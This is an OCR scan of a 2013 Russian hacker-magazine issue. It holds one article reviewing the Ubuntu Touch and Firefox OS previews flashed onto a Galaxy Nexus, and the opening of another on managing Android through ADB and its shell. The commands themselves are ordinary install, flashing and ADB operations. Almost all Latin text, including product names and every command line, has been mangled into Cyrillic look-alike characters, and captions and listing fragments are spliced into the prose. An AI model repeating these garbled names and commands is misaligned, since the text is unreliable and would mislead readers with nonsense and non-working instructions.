НА САЕАХУ МЕХО$ 


Мир мобильных операционных систем не огра- 
ничивается Апагога, 10$ и \ММпао\и$ Рпопе. Почти 
каждый год мы видим появление новых опера- 
ционных систем для смартфонов и планшетов, 
каждая из которых может предложить пользова- 
телю что-то свое. В этой статье я расскажу о лич- 
ном опыте использования двух перспективных 
ОС, которые в ближайшем будущем вполне могут 
занять свое место на девайсах именитых фирм. 
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ь д 
Евгений Зобнин 
апагоа$тгее{. ги 


ВВЕДЕНИЕ 

У «референсных» смартфонов от СооФ(е, таких как бааху Мехиз 
и М№ехи$ 4, есть множество плюсов. Они полностью открыты, 
разработкой ОС для них занимается сама Сооде, обновления 
всегда своевременны и происходят в день публикации исход- 
ных текстов новой версии Апаго. Эти смартфоны очень ценят- 
ся в кругу моддеров, и они первые кандидаты на портирование 
новых версий кастомных прошивок. 

Однако еще более интересная деталь — это то, что в по- 
давляющем большинстве случаев их выбирают разработчики 
альтернативных ОС в качестве основной платформы разра- 
ботки. Так произошло и с компанией Мо7Ша, которая выпусти- 
ла Нгеох О$ для Са!аху Мехи$, и Сапотса!, предварительная 
версия Убити Тоисй за авторством которой вышла для того же 
смартфона. 

Как владелец референсного гуглофона, я не мог пройти 
мимо этих событий и не протестировать новые ОС на своем 
аппарате. Тем более что в этом случае открывалась интересная 
возможность сравнить производительность и характеристи- 
ки систем на идентичном железе. Поэтому, сделав папоаго- 
бэкап своей основной прошивки (Рагапо!ААпагога 3.1), я отпра- 
вился на поиски имеджей для прошивки. 
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ОВОМТОТООСН 


Прожженный линуксоид, уже давно забывший, как выглядит 
\ММпаом/$, я с нетерпением ждал появления Убитщи Тоисп (в де- 
вичестве Убитщи ог рпопе$, она же Чбити 12.10 в исполнении 
для смартфонов и планшетов) — полностью открытой, разви- 
ваемой независимыми командами разработчиков, изменяемой 
с любой стороны и включающей в себя набор всего инструмен- 
тария нормальной Ипих-системы (а не того огрызка консольных 
команд, который есть в Апагоа). Система действительно каза- 
лась лакомым кусочком, который хотелось потрогать собствен- 
ными руками. 

Недолго думая, я пошел на сайт ибипи.сот и начал читать 
инструкцию по установке (чоо.9/птОК.). Система поставляет- 
ся в четырех вариантах: для смартфонов Са!аху Мехи$, Мехи$ 
4, а также планшетов Мехи$ 7 и Мехи$ 10. В любом случае тре- 
бовалась разлочка загрузчика с помощью команды Тазфос{ 
из состава Апагога ЗОК, а также установка дополнительных ин- 
струментов, таких как АБВ (который, впрочем, тоже есть в $0К), 
и фирменной утилиты для прошивки рпа -Назп. Установка 
утилит производится с помощью следующих команд: 


$ зидо ааа-ар*-геро$1Фогу рра:рпаб1е*-+еат/%0015 

$ зидо арЕ-веф ирда*е 

$ зидо арЕ-веф 1п5%а11 рпаб1е*-+001$ «<= 
апаго1а-%001$-а@6 апаго1а-{001$-а$ЕБоо* 


Далее следует подключить смартфон в режиме отладки 
и запустить две команды, которые скачают нужную прошивку 
и установят ее на девайс, убив существующий Апагог: 


$ рНаб1е*-Яазй -Ь 
$ рпаБ1е{-Яа$И 


Все это нужно делать в настольной версии Убип, но я, 
как пользователь Агсй Шпих, поступил проще, скачав Чбити 
в упакованном для прошивки через СоскмтокМоа виде (900. 
О/Ап59) и установив систему стандартным для Апаго9- 
хакеров методом. Для интересующихся: нужны файлы ацата|- 
ргет{а!еЯ-агте!+тадиго.лр (специфичный для устройства, 
тадиго = Сааху Мехи$) и дацаща!-ргетза!еа-рпае-апт!Т.7р 
(универсальный, для всех устройств), шить в той же последо- 
вательности. 


ПЕРВАЯ ЗАГРУЗКА 

Первое, на что обращаешь внимание, установив Убищи, — 
это скорость загрузки. Она происходит не в пример быстрее 
Апаго и длится не больше десяти секунд (спасибо системе 
инициализации Ур$ам), после чего на экране появляется экран 
блокировки, точно такой же, как на роликах и скриншотах, по- 
казанных Сапотса|!. По идее этот экран должен быть «живым», 
то есть отображать разного рода полезную информацию, 
но у меня он показал 14 непрочитанных сообщений в Твиттере, 
причем, как и следовало ожидать, фиктивных. Просто демон- 
страция работы. 

Сдвинув экран блокировки справа налево, мы попадаем 
на главный экран, неожиданно названный «Ноте». Это своего 
рода сборник часто используемого контента; здесь отобража- 
ются иконки наиболее используемых приложений, контакты, 
которым ты постоянно названиваешь и пишешь, люди, только 
что зашедшие в сеть (в Гасебоок, например), список последних 
прослушанных композиций и популярные онлайн-видео. Все это 
располагается на одном проматываемом вниз полотне и опять 
же наполнено фиктивным демонстрационным контентом: прило- 
жениями, которые я никогда не запускал, людьми, работающими 
в компании Сапоптса!|, видеозаписями, которых нет в природе. 

Слева и справа от главного экрана располагается еще 
по два экрана, на которые можно переключаться свайпом. Сле- 
ва это «Мис» и «Реоре», то есть, по сути, просто списки музыки 
и людей из контактов, красиво оформленные, с фотографиями 
и трехмерными эффектами проматывания. Справа находятся 
экраны «Арр$» и «\Лаео$». На первом размещены иконки часто 
используемых приложений, всех установленных приложений, 
а также доступных для загрузки (к ним мы вернемся позднее). 
На экране «\Маео$» содержится список популярных и недавно 
добавленных в местный репозиторий Убити Опе видеофайлов, 
в основном фильмы и сериалы. 
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Апагоа и длится не больше десяти секунд 
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Это основной интерфейс Убитщи, который, как легко заме- 
тить, сильно ориентирован на контент и людей. В общем-то, это 
верно, учитывая то, как люди используют современные смарт- 
фоны, но может быть непривычно для новых пользователей. 
Как ни крути, а даже М/пао\ми$ Рпопе с его необычным интерфей- 
сом, по сути, следует все той же стандартной модели рабочего 
стола с иконками, виджетами и списком приложений. Поэтому 
здесь с вхождением на рыноку Сапопса! могут быть серьезные 
проблемы. 

Как бы там ни было, на этом интересности интерфейса 
Орбит не заканчиваются. Как уже отмечали разработчики ОС, 
интерфейс полностью основан на идее свайпов, которые здесь 
используются практически для всего. Свайп с верхней границы 
экрана открывает знакомую нам по Апаго панель уведомле- 
ний, однако здесь ее содержимое полностью зависит от иконки 
в статусбаре, за которую ты ее вытягиваешь. Потянув за иконку 
батареи, ты увидишь окно с информацией об оставшемся заря- 
де и ползунок управления яркостью (датчик освещения, кстати, 
не работает, хотя галочка стоит). Вытянув «часы», можно увидеть 
текущую дату и настройки временной зоны, вытягивание значка 
«конверт» приводит к открытию списка уведомлений. Таким же 
образом производится поиск и подключение к \\1-Н!'-сети (это 
очень важно, потому что мобильный интернет не работает, даже 
2@, проходят только звонки и ЗМ$). В целом идея интересная, 
но спорная в силу крохотного размера иконок, по которым 
очень легко промахнуться. 

Свайп слева открывает список установленных приложе- 
ний, реализованный в виде выплывающего дока Упку. Очень 
удобная штука. Свайп справа — переход к следующему ра- 
ботающему приложению, если в данный момент на экране 
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другое приложение. Свайп снизу — меню 
текущего приложения, а также быстрый 
доступ к списку текущих запущенных 
приложений, функционалу, идентичному 
свайпу сверху, и строке поиска. Своего 
рода глобальное меню с доступом ко все- 
му. Довольно спорное решение, которое 
поначалу сильно запутывает. В целом же 
свайпы — самая сильная черта интерфей- 
са Убиты, к которой тем не менее прихо- 
дится привыкать. 

Теперь о приложениях. Здесь все 
очень просто. Большинство приложе- 
ний — заглушки, что особенно непри- 
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камеру, симпатичная галерея с раз- 
бивкой по датам и... все. В списке при- 
ложений есть ТмЩег и Гасербоок, но это 
всего лишь ссылки на мобильные версии 
веб-сайтов. Все это тем не менее впол- 
не ожидаемо, учитывая позиционирова- 
ние текущей версии ОС как инструмента 
для разработчиков. Тот же Апагога, вклю- 
ченный в первую версию $ЗО0К от бооде, 
был немногим богаче. 
Производительность на уровне. Пере- 
ходы между столами и приложениями 
плавные, эффекты радуют глаз. Тем не ме- 
нее во время использования смартфон 


Давно ожидаемая Обити Тоисй — 

это не что иное, как Апагоа, из которого 
убрали виртуальную машину Рамк 

и графическую оболочку! 


ятно в случае с моей любимой игрой 
Ку Затап, вместо которой просто кар- 
тинка с начальным экраном. То же са- 
мое и с музыкальным плеером. Убита 
Опе — просто ссылка на веб-сайт. 
Список доступных к загрузке приложе- 
ний — нереагирующие иконки. Работа- 
ют: телефон, интегрированный с $М5$- 
сообщениями (удачная идея, кстати 
говоря), калькулятор, простенький бра- 
узер, при открытии которого происходит 
автоматический переход на сайт Убищи, 
видеоплеер с фильмами Зи! и Теаг$ о? 
Зеа! от Вапаег Гоипдайоп для примера 
(проигрываются без проблем, датчик 
положения работает), вполне работа- 
ющая камера с возможностью записи 
видео и переключения на фронтальную 


ощутимо нагревается и достаточно бы- 
стро теряет заряд батареи (субъективно 
быстрее андроида). Иногда случаются 
небольшие лаги и капитальные зависания 
ОС, спасает от которых только отключение 
батареи (слава семисекундной загрузке). 


ЧТО ВНУТРИ? 

Самое интересное, как всегда, внутри. 
Все мы знаем, что Убити основана 
на ядре Шпих, и логично предположить, 
что в случае с ее мобильной реинкарна- 
цией все осталось на месте. На самом 
деле все куда интересней. Дело в том, 
что ЧУбитщи Тоисй основана не столько 
на ядре Ипих, сколько на самом Апаго. 
Да, да, именно так. Давно ожидаемая 
по-настоящему свободная мобиль- 
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ная операционная система от Сапопса! — это не что иное, 
как Апаго!а, из которого убрали виртуальную машину Вамк, 
графическую оболочку и положили сверху дистрибутив 
бити 12.10 со специальным интерфейсом, основанным 
на библиотеке ОМ. 

Низкоуровневая (и самая сложная в реализации) часть это- 
го пирога — все тот же Апагоа. Графическая библиотека, де- 
моны и интерфейсы для работы с сетью, драйверы сенсоров 
и чертова дюжина других компонентов — немодифицирован- 
ный Апаго. Ты видишь на экране картинку, а отрисовывает 
ее андроидовский ЗиНасеЕтодег, ты звонишь, а звонок идет 
через Апагоа-демон 4, ты наклоняешь смартфон, а за по- 
ворот экрана отвечает драйвер, разработанный для Апаго. 
Именно этот факт, кстати говоря, объясняет, почему с момента 
релиза Убит Тоисй он был портирован на такое количество 
устройств. Ответ заключается в том, что никакого портирования 
и не происходило, все, что требовалось сделать, — это взять 
стандартную прошивку Апаго!а, выкинуть из нее все, кроме ба- 
зовых компонентов, положить сверху уже готовую файловую 
систему Убитщи Точцсй и заставить ее загружаться. Неплохой за- 
дел для переносимости, не правда ли? 

Теперь о той самой Убищи, лежащей под красивым и плав- 
ным интерфейсом. Это действительно самый настоящий дис- 
трибутив Убит 12.10, урезанный до более-менее вменяемых 
размеров. К нему можно подключиться с помощью АВВ (да, 
и здесь Апагом) и, например, обновить или установить Араспе. 
Кстати, в комплекте уже есть $$Па, правда, просто так он не за- 
работает и придется пошаманить (подробнее в официальном 
руководстве: аоо.а/ЧхиТМ). Во всем остальном это самый на- 
стоящий дистрибутив Ипих. 


ВЕРДИКТ 

Обитщи ТоисП вызывает смешанные чув- 
ства. Ее интерфейс хоть и интересен, 
но выглядит довольно странно и очень 
непривычно. Главный экран похож вовсе 
не на рабочий стол, а на окно магазина 
контента, из-за чего возникает ощуще- 
ние, что используешь не ОС, а какую-то 
странную программу, которую можно за- 
крыть и попасть на настоящий рабочий 
стол. Общий юзер экспириенс также до- 
вольно специфичный из-за иного подхо- 
да к управлению. Идея «все есть свайп», 
конечно, интересна, но как Сапотса! со- 
бирается пересаживать на ОС с такой не- 
очевидной системой управления новых 
пользователей — для меня остается за- 
гадкой. Особенно учитывая такие дикие 
идеи, как возвращение на рабочий стол 
с помощью... открытия дока. Здесь руга- 
емые всеми наэкранные клавиши Апагоа 
4.Х выглядят куда более очевидным 
и удобным решением. 

Тем не менее у Убити есть очень силь- 
ная черта. Это ее родословная. Как ни кру- 
ти, а полноценный дистрибутив Ипих уж 
очень привлекателен, тем более что на- 
личие всех возможных библиотек, утилит 
и инструментов создает сильный задел 
для будущих разработчиков, которым оста- 
нется лишь обернуть зарекомендовавший 
себя код в красивую графическую оболочку. 


ЕГВЕРОХ 0$ 


Следующей на очереди стала Ететох 05$, 
она же Воо{2Сеско, она же В2С в сокра- 
щенном варианте. Анонс этой ОС состо- 
ялся еще в середине предыдущего года, 
и все это время Мо?7Ма активно работала 
над системой, успев показать множество 
скриншотов, написать большое количе- 
ство документации по архитектуре, разра- 
ботке приложений и общим идеям интер- 
фейса, а также выпустить эмулятор в виде 
плагина для собственного браузера. 
Риетох О$ привлекла мое внима- 
ние сразу. Как и операционные системы 
мебО$ и Тшеп, она основана на идее ис- 
пользования веб-технологий для создания 
приложений и интерфейса ОС. Однако 
выбранный Мо7Ша подход куда более ин- 
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тересен с точки зрения живучести опе- 
рационной системы и ее привлекатель- 
ности для разработчиков. Дело в том, 
что она не просто использует НТМИ5, С$$ 
и Чамасир{ в качестве базы для приложе- 
ний, а полностью основана на открытых 
веб-стандартах. Здесь нет специализиро- 
ванной библиотеки виджетов, обернутой 
в Чауасирф, как в меб О5, нет собственного 
АР, как в той же меБО$ и Теп, нет ника- 
ких прослоек в виде Рпопебар, на которую 
не так давно перешла меб О$. Есть только 
чистый НТМЕ$5, полностью соответствую- 
щий веб-стандартам. 

Почему это так важно? Потому 
что в РАгеох О$ фактически нет различия 
между обычными и веб-приложениями. 
Любое веб-приложение может быть 
без изменений упаковано в приложение 
для Нгетох О$, и любое приложение Ететох 
О$ можно запустить в любом соответ- 
ствующем стандартам браузере. Хочешь 
перенести свое крутое веб-приложение 
в Нгеюх О$ — нет проблем, упакуй его 
клиентскую часть в подходящий формат 
и выложи в маркет. Полное стирание гра- 
ниц между вебом и операционной систе- 
мой, полностью облачная платформа — 
не за такими ли системами будущее? 

Само собой разумеется, что на деле 
все это могло быть не так привлекатель- 
но. Все-таки уамаЗсирЕ не самый быстрый 
на свете язык, да и НТМЕ5 и С$$ требуют 
достаточно больших вычислительных мощ- 
ностей для обработки. Поэтому, как толь- 
ко ОС была доведена до сколько-нибудь 
юзабельного состояния, я не замедлил 
установить ее на свой аппарат. Согласно 
странице с инструкциями на сайте Мо?1а, 
операционную систему следует собрать 
самостоятельно из текущего среза дере- 
ва исходников. Предлагается получить 
исходники с помощью С\, запустить про- 
цесс сборки, подключить смартфон к УЗВ 
и прошить ОС: 


$ =1Е с1опе 21%: //в1ПиЬ. сот/ += 
10711]а-625/В26.511 

$ са В26 

$ ./сопйе.$5И ва1аху-пехи$ | 

$ ./Билла -32 

$ ./Яа$и 


НастроеквЕпетох О$ действительно много 


Магазин приложенийв ЕйеТох О$ выполнен в виде сайта 


На деле все оказалось сложнее. По каким-то неведомым 
мне причинам на определенном этапе процесс выкачивания 
исходников останавливался с сообщением о невозможности 
получить доступ к репозиторию, и сколько бы я ни пытался его 
возобновить, сколько бы раз ни начинал сначала и ни обновлял 
дерево репозиториев, сообщение никуда не исчезало. Прому- 
чившись так два дня, я пошел на ХОА и скачал последний билд 
ОС, собранный Ахе!2033, который в жизни оказался Ильей Ак- 
сеновым (аоо.а/а4ксС1). Билд был хоть и несколько устаревшим 
и с багом масштабирования (картинка была несколько мелко- 
ватой, явно рассчитанной на планшеты), но зато стабильным, 
что позволяло без лишних мучений протестировать ОС прямо 
здесь и сейчас. 


ПЕРВАЯ ЗАГРУЗКА 

Время загрузки ОС оказалось еще меньше, чем в случае 
с Убит Тоисй. Общая продолжительность от экрана с надпи- 
сью @дооЧе до экрана блокировки составила всего четыре се- 
кунды. И это при том, что ОС сразу была готовой к использова- 
нию (то есть никаких фоновых задач, как в том же Апагоа, уже 
не выполнялось). 


нести на этот экран иконки приложений 
не получится, и зачем он нужен, пока непо- 
нятно. Скорее всего, в будущем на нем ста- 
нет отображаться какая-то полезная ин- 
формация вроде погоды и уведомлений. 
Свайп влево открывает экран с икон- 
ками различных популярных сайтов, рас- 
сортированных по папкам. Тап по любой 
из них открывает браузер. Иконки можно 
добавлять и удалять. Свайп вправо — экра- 
ны с приложениями, по 16 на каждом. Идеи 
меню приложений, как в Апаго, здесь нет, 
и любое установленное приложение сразу 
попадает на один из этих экранов. Располо- 
жение иконок можно менять, а также можно 
их удалять (вместе с самим приложением). 
Свайп с верхнего края экрана откры- 
вает уже ставшую стандартной для мо- 
бильных ОС «шторку» с уведомлениями, 
иконками управления питанием (напри- 
мер, включение \\М-Н, Виеос{й и так да- 
лее) и неработоспособным счетчиком 
скачанных данных. Внизу шторки также 
есть кнопка для доступа к настройкам, 
которых здесь, к моему удивлению, оказа- 
лось довольно много. Функционал не хуже, 
чем в Апагою, и доступна даже настройка 
смартфона в режиме По5зрот. 
Вот, собственно, и весь интерфейс. 
По общему впечатлению от использования 
он довольно сильно напоминает облег- 
ченный и доведенный до ума интерфейс 
Апагоа. Взять хотя бы кнопки в шторке, 
о которых уже давно просят пользователи 
Апагоа, но Сооде упорно их не реализует, 
а вместо этого делает отдельную шторку 
с кучей кнопок (Апагога 4.2). Или уведом- 
ления на экране блокировки. Здесь это 
стандартная функция, а для ее получения 
в Апаго@ приходится устанавливать либо 
альтернативный экран, либо Апагоа 4.2 
с его жуткой реализацией поддержки вид- 
жетов на экране блокировки. В целом ин- 
терфейс приятный и неперегруженный. 
Теперь о приложениях. В стандартной 
поставке их немного. Есть камера (не- 
рабочая), галерея, ЕМ-радио (которое, 
по понятным причинам, на Са!аху Мехиз 
не работает), часы, календарь, почтовый 
клиент, браузер, телефон, музыкальный 
и видеоплеер, а также парочка игр и не- 
сколько тестовых приложений для провер- 


Время загрузки Егех[ох О$ оказалось еще меньше, 
чем в случае с ОбБити 'Тоисйп, — от экрана с надписью 
Соод[е до 1осК $сгееп прошло всего четыре секунды! 


Экран блокировки оказался достаточно стандартным, имя 
оператора, часы и выдвигаемая снизу панель с двумя кнопка- 
ми: камера и разлочка. Камера оказалась неработоспособной, 
а нажатие на кнопку разлочки привело к открытию «мастера 
первого запуска», который проводит пользователя через пять 
шагов по начальной настройке смартфона. На первом шаге 
нам предлагают выбрать язык (русского пока нет), на втором — 
включить обмен данными (то бишь интернет), на третьем — на- 
строить \М-Н!, далее — выбор часовой зоны и импорт контактов 
из Расербоок и $!М-карты. 

Затем открывается рабочий стол, состоящий из нескольких 
экранов. Изначально мы получаем доступ к главному экрану, 
на котором отображаются только часы и док с иконками «Теле- 
фон», «5М5$», «Люди», «Браузер» и «Отзыв», открывающий про- 
стое приложение для отправки отзывов разработчикам. Пере- 


ки работоспособности сенсоров и других 
железяк. Все они прекрасно работают, 
а приложения действительно удобны, так 
что в этом плане РЕгетох О$ уже почти пол- 
ноценная ОС. 

Отдельно хотелось бы сказать о мар- 
кете. Реализован он здесь в виде иконки, 
которая приводит к открытию мозиллов- 
ского веб-магазина. В нем уже можно най- 
ти достаточно много приложений, но все 
они представляют собой опять же ссылки 
на полноценные веб-приложения. Ты уста- 
навливаешь приложение, на рабочем сто- 
ле появляется его иконка, по тапу на кото- 
рой открывается веб-страница. В будущем 
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здесь, конечно же, должны появиться на- 
стоящие программы. 

Если говорить о скорости работы, 
то здесь дела пока идут неважно. В общем 
и целом интерфейс Ргетох О$ не тормозит: 
переходы между столами достаточно плав- 
ные, приложения открываются быстро, од- 
нако низкий фреймрейт заметен сильно. 
Немногочисленные эффекты явно рабо- 
тают со скоростью не больше 30 кадров 
в секунду, а то и 10. Не знаю, ускорен ли 
интерфейс с помощью ОрепсЕ, но он точ- 
но поддерживается, так как сайт чет.лмер 91. 
ога выдает плавно вращающийся кубик, 
а установленное из маркета приложение 
для ЗО-моделирования интерьеров рабо- 
тает без явных подтормаживаний. 


ЧТО ВНУТРИ 

Как и Убитщи Тоисй, операционная система 
от Мо7Иа изнутри — чистый Апагою. Факти- 
чески это даже не ОС, а положенный поверх 
Апагоа-окружения НТМ!-движок Сеско, 
который запускается на этапе загрузки 
с помощью скрипта. При старте Сеско от- 
крывает локальную веб-страницу, которая 
формирует интерфейс ОС. Далее начинает- 
ся чистый НТМЕЪ, вплоть до того, что даже 
настройки хранятся в формате У/$ОМ. 

При всем при этом в системе реализо- 
вана довольно сильная модель безопасно- 
сти. Как и в Апагоа, каждое установленное 
приложение запускается в собственной 
песочнице и с наложением ограничений 
на доступные АР!. Доступ к защищенным 
АР! (таким, например, как возможность со- 
вершения звонков) открыт только систем- 
ным приложениям. Каждое приложение 
может управлять только своими файлами, 
доступ к которым ограничен с помощью 
АСЕ. Приложения, запускаемые в веб, 
имеют ограниченные привилегии. Обмен 
данными производится строго с помощью 
специального АР. 


ВЕРДИКТ 

Минималистичная, элегантная и непере- 
груженная Етеох О$ мне показалась го- 
раздо более интересной ОС в сравнении 
с громоздкой Убитщи Тоисп, один устано- 
вочный образ которой весит 500 Мб. Уже 
сейчас это почти законченная ОС, которой 
приятно пользоваться и которую приятно 
видеть на своем аппарате. Если разра- 
ботчики смогут довести систему до ума 
и она будет популярна среди разработчи- 
ков приложений, тоя с удовольствием при- 
обрету аппаратс Егеох О$ на борту. 


ВЫВОДЫ 

Открытый андроид не только позволил 
смартфонам сделать большой шаг вперед, 
принеся в мобильный мир по-настоящему 
кастомизируемую ОС, он также дал со- 
вершенно новые возможности для разра- 
ботчиков сторонних ОС. Теперь они могут 
воспринимать смартфон не как аппарат- 
ную платформу, а как связку аппаратной 
и программных частей, где ядро, драйверы 
и инструменты уже реализованы и пор- 
тированы и остается только реализовать 
свое видение того, как должна выглядеть 
и работать мобильная ОС. Убити Тоисй 
и Нгеюх ОЗ показывают, что ОС может 
быть совсем не такой, какой мы ее привык- 
ли представлять. 2= 
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РОБОТ 
НА ПОВОДКЕ 


Евгений Зобнин 


НегА$ Ве оуез$ @ Искг.сот 


УПРАВЛЯЕМ АМОНОШО, ИСПОЛЬЗУЯ КОНСОЛЬ 


Как мобильная операционная система, Апагоа неукоснительно следует идее простого 
и очевидного способа управления с помощью касаний и различных экранных жестов. 
Тем не менее внутри Апаго!а остается основанной на ядре Ипих ОС, в которой есть терминал, 
набор консольных инструментов и ядерные интерфейсы управления, такие как /ргос и /5уз. 
Сегодня мы поговорим о том, как использовать все это богатство напрямую, 
заставив смартфон делать то, на что он не рассчитан. 


56 Х-МоБПе 


ЗАЧЕМ ЭТО НУЖНО? 

Любой, кто хоть мало-мальски знаком с Ипих, знает, насколько 
эффективной может быть консоль для решения задач самого 
разного спектра. С помощью консоли пользователь получает 
полный контроль над системой и может сделать вещи, кото- 
рые невозможны при использовании более высокоуровневых 
инструментов. Так, вооружившись консолью и правами гос\, 
ты сможешь очистить смартфон от ненужных стоковых при- 
ложений, изменить анимацию загрузки, установить новые 
шрифты, сделать приложения системными, выявить наиболее 
прожорливые приложения, перенести приложения на карту 
памяти и сделать многое, многое другое. 

Само собой разумеется, что набирать команды на неболь- 
шом экране смартфона — дело не самое удобное, поэтому 
я советую вбивать команды в терминал с помощью «большого» 
компа. Тем не менее все то же самое можно сделать, устано- 
вив Апаго Тегтта! на смартфон и воспользовавшись ЧЗВ- 
или Вищосо{-клавиатурой. 


АОВ 

Итак, как же получить доступ к консоли Апаго с компа? 
Для этого боое придумала замечательный инструмент АБВ 
(Апагоа Бебид Впаде), предназначенный для выполнения 
разного рода сервисных задач, а также для отладки прило- 
жений и операционной системы. АБВ состоит из двух компо- 
нентов: сервера, работающего на смартфоне, и клиента, кото- 
рый следует запускать на компе, предварительно подключив 
смартфон с помощью У$В-кабеля. 

Сам клиент АОВ — это небольшая консольная утилита, ко- 
торая поставляется в комплекте с Апагоа $О0К. Ты найдешь 
ее в каталоге раМопт-{001!$ внутри корневого каталога $ЗО0К. 
Например, С://Апагоа ЗОК/р!аМогт-ю01$/ааб в М/Ипао\м$ или 
что-то вроде /Поте/уазуа/апагоа-5Ак-Ппих/р!аНгот-{0015/ааб 
в Ипих. Сразу рекомендую скопировать файл аар (или ааЬ.ехе 
в МИпаом/5) куда-то в более удобное место. 

Запускать АОВ следует из командной строки 0О$ 
в МИпаом/$ или эмулятора терминала в Ипих. Никакого интер- 
фейса у нее нет, поэтому все управление производится с по- 
мощью команд. Первая команда, которая нам нужна, — это 


$ ааь ае\у1сех 


Она должна вывести список доступных для управления 
с помощью АБВ устройств. Если ты подключил смартфон/ 
планшет через ЧУЗВ-кабель, но ааб аемсез$ не видит его, зна- 
чит, следует включить режим отладки в Апагов. Для этого 
переходим в «Настройки -> Для разработчиков» и включаем 
опцию «Отладка по УЗВ». Теперь в ответ на команду должен 
быть выведен серийный номер устройства: 


[1$ оф аеу1се$ аЕфасВеа 
0146А00016016010 е\1се 


Если ты видишьна экране нечто похожее, значит, ты на коне. 


Сразу скажу, что теперь доступ к консоли можно получить так: 


Настройки 


Настройки Рагапо!ЧАпаго!9 А 


Отладка по И5В 


дки при 


ув се 
Дата и время АГ Е еее У 


Спец. возможности 


Отчеты об ошибках 


Суперпользователь 


Фиктивные местоположения 


АО гс были предоставлены права Суперпользователя 


выберите приложение для отладки 


О телефоне 
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[]1т@]оса1Ро$+ пеш]$ аЧЬ эВе11 
гоо+@апЧго19:/ # ипате -а 
-1пух 1оса1Розт 3,8.31-суаподептод-964е9296 #1 5МР РЮЕЕМРТ Нед Маг 6 84:08:29 БМТ 2013 агт\у71 БМ 


ЦИ 1пих 
гоо1@ап9го19:/ # ирт1те 


ур 11те: 19:58:26, 191е 11те: 84:58:27, $з1еер 11те: 17:81:59 


ГОО @ап9го19:/ # 194 
и19=8 (гоот) 919=8(гоот) 
го @ап9го19:/ # тоипт 


гоо{@ап4го19:/ # Тгее 


| Беад -5 
гоо115 / гоо{Т$ го, ге1а*1те В В 
ттрт$ /Чему ТтрТз гш, поз$и194 ,ге|а{т1те , поде=755 8 В 
Чеурфз /Чеу/рф$ Чеурфз гш,ге1а%1те , поде=60й И В 
ргос /ргос ргос гш,ге1ат1те В В 
$4515 /5Ч5 $4515 гш,ге|1ат1те Й Й 


Тгее ТгеегатЯ1$К 
гоо+@ап9го!9:/ # Тгее 
Тота1 уизе9 Тгее эрагеч БитТег$ 
Мет: 710676 682796 27888 [] 536 
—/+ БиГТег$: 682268 28416 
бшар: в [2 [ 
гоо+@ап9го149:/ # 
В Апаго! доступны $ ааь хпе11 


многие стандартные 
команды Ипих 


МЕО 


Из-за ограничения 
на права доступак ИЗВ- 
устройствам, в некоторых 
ИЧпих-дистрибутивах АБВ 
будет работать только 
при наличии прав гоо1. 


Прошивка 
СуаподепМоч и про- 
изводные позволяют 
включить сетевой 
режим АОВ изкоробки 


Однако перед тем, как перейти к основному изложению, 
я хотел бы рассказать о других возможностях АВВ, среди ко- 
торых много полезностей. Наиболее интересные функции 
АОВ — это возможность установки/удаления приложений пря- 
мо с компа и копирование файлов туда-обратно. Для тех, кто 
с консолью наты, эти функции открывают просто невероятные 
возможности. Например, для установки софта с жесткого дис- 
ка можно использовать такую команду: 


$ ааб 1п$$а11 /путь/до/приложения.арк 


А для загрузки фотографий с карты памяти такую: 


$ ааб ри11 /засага/оСТМ/Сатега 


Чтобы положить файл на карту памяти, достаточно сделать 
так: 


$ ааб /какой/то/каталог/фильм.а\1 /5Ч9сага/\1аео 
Более того, совместив возможности АВВ со знанием Ипих- 
систем, можно делать и вовсе неожиданные вещи. Например, 


снять скриншот: 


$ ааб ри11 /аеу/=гари1с$/+60 


Правда, файл 100 еще придется преобразовать в нормаль- 
ное изображение с помощью Нтресд (Мпих): 


$ ЕЕтреё -у+гате$ 1 -+ гаму1аео -р1х_ФтЕ гёБ3З2 «= 
-5 720х1280 -1 +160 +60.рпй 


Но вернемся к нашим консолям. 


КОНСОЛЬ 

Итак, команда ааб Пе! открывает консоль Апагоа. Для зна- 
ющих Ипих все здесь будет знакомо, это вполне стандартная 
Ч/пих-консоль, но с не полным набором команд. Что мы можем 
сделать с ее помощью? Да в общем-то, что угодно. Например, 
копировать, перемещать и удалять файлы с помощью команд 
ср, ту и гт. Ходить по каталогам с помощью са. Узнать версию 
ядра Ипих, используя ипате: 


$ чпате -а 
Е1пих 1оса1Ио$* 3.0.31-суаповептоа-264е9296 #1 
$МР РКЕЕМРТ Моп Маг 4 07:12:19 СМТ 2013 агту71 
СМУ /Е1пих 


Узнать, сколько прошло времени с последней перезагрузки: 


$ ирЕ1те 
ир 1те: 21:41:38, 1а1е Е1те: 05:51:46, $1еер 
Е1те: 18:09:49 


Узнать о самых прожорливых приложениях с помощью 
команды Тор и количестве свободного пространства на вну- 


ХАКЕР 05 /172/ 2013 Роботна поводке 


[--ю СОУМТ] [-5] [--орепд1-Тгасе] 


ат К11]1-а1] 


[--изег «И5ЕЮ_10» | сиггепт] 


ат с1еаг-ЧебБиуд-арр 

ат топ1Тог [--996 «рогт>] 

ат эсгееп-сотрат Гоп|!отТт] «РАСКАБЕ» 
ат 91$р1ац-$12е [гезет|Нхн] 

ат 91зр1ау-Чеп$1+у [гезет |ВЕМЗ ТТУ] 
ат То-иг1 Г1МТЕМТ] 

ат То-1птепфт-иг1 [1МТЕНМТ] 

ат 5ш1тсА-изег «И5ЕЮ_ 10» 

ат зТор-изег «И5ЕЮ_ 10» 


[--изег «И5ЕЮ_10» | сиггепт] <1МТЕНТ» 
ат $тагфзегу1се [--изег «И5ЕЮ_10» | сиггепт] <1НТЕНТ» 
ат Тогсе-зФор [--изег <У5ЕЮ_10» | а!1]1 | сиггеп+] «РАСКАБЕ» 
ат К111 [--изег <И5ЕЮ_10» | а!1]1 | сиггепт] <РАСКАБЕ» 


[--по-ш1пдош-ап1таф*1оп] «СОМРОМЕМТ» 
ат ргот1]е зТтагф [--изег «У5ЕК_10» сиггепт] «РЮОСЕ$5» «ЕЕ» 
ат ргот11е зфор [--изег <У5ЕВ_10» сиггеп{] [<РЮОСЕ$5»] 
ат Читрбеар [--изег «У5ЕВ_10>» сиггеп{т] [-п] <РЮОСЕЗ5» «ЕЕ» 
ат зе{т-ЧеБиуид-арр [-ш] [--рег$1$Тепт] «РАСКАБЕ» 


узаде: ат $Тагф [-01 [-Н] [-Р <ЕТШШЕ»] [--5Фагф-ргот11ег <Е1ШЕ>] 


ат БгоаЧ9са$+ [--изег <И5ЕК_10» | а!1 | сиггепт] <1МТЕНТ» 
ат 1пзтгитепф [-г] [-е «МАМЕ» «МАШУЕ»1 Г[-р <Е1ШЕ»1 [-ш] 


Все фирменные Апагоа-команды имеютвстроенную справку, показываемую после запуска 


команды без аргументов 


